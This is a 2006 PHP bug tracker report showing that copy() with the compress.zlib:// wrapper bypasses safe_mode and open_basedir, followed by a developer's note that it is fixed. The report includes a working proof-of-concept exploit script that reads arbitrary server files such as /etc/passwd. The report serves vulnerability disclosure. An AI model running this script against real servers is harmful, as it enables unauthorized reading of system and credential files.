PHP :: Bug #37071 :: zlib exploit

Bug #37071

zlib exploit

Submitted:

2006-04-13 13:28 UTC

Modified:

2006-04-14 17:50 UTC

Votes:	2
Avg. Score:	4.5 ± 0.5
Reproduced:	2 of 2 (100.0%)
Same Version:	2 (100.0%)
Same OS:	1 (50.0%)

From:

unsecretarygeneral at gmail dot com

Assigned:

Status:

Closed

Package:

Safe Mode/open_basedir

PHP Version:

4.4.2

OS:

all

Private report:

CVE-ID:

None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	unsecretarygeneral at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2006-04-13 13:28 UTC] unsecretarygeneral at gmail dot com

Description:
------------
The zlib fopen function boes not adhere to safe_mode , or open_base directory , hence an attacker can use zlib to compress 'any' file to a temp folder / world writable folder .. 

This should be critical , and is NOT fixed in the current CVS . 

Reproduce code:
---------------
Example code . : called like http://hostname/?file=/etc/passwd

<?php


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file))
{
        if(empty($_GET['file']))
        {
                if(empty($_POST['file']))
                {
                        die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"
);
                }
                else
                {
                        $file=$_POST['file'];
                }
        }
        else
        {
                $file=$_GET['file'];
        }
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp))
{
        $zrodlo = fopen($temp, "r");
        $tekst = fread($zrodlo, filesize($temp));
        fclose($zrodlo);
        echo "<B>--- Start File ".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File".htmlspecialchars($file)." ---------------\n";
        unlink($temp);

        die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)." has been already loaded. SecurityReason Team;]</B></FONT>");
}
else
{
        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>");
}
?>


Expected result:
----------------
list of /etc/passwd

Actual result:
--------------
list of /etc/passwd

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2006-04-14 17:50 UTC] pollita@php.net

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.

The bug isn't in zlib (the inner fopen_wrapper simply passes on the options its given).  The problem is in copy() (which passes the wrong options).

5.1 already had the correct flags, but not other branches, I've applied a fix to everywhere else.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Wed Jul 02 16:01:37 2025 UTC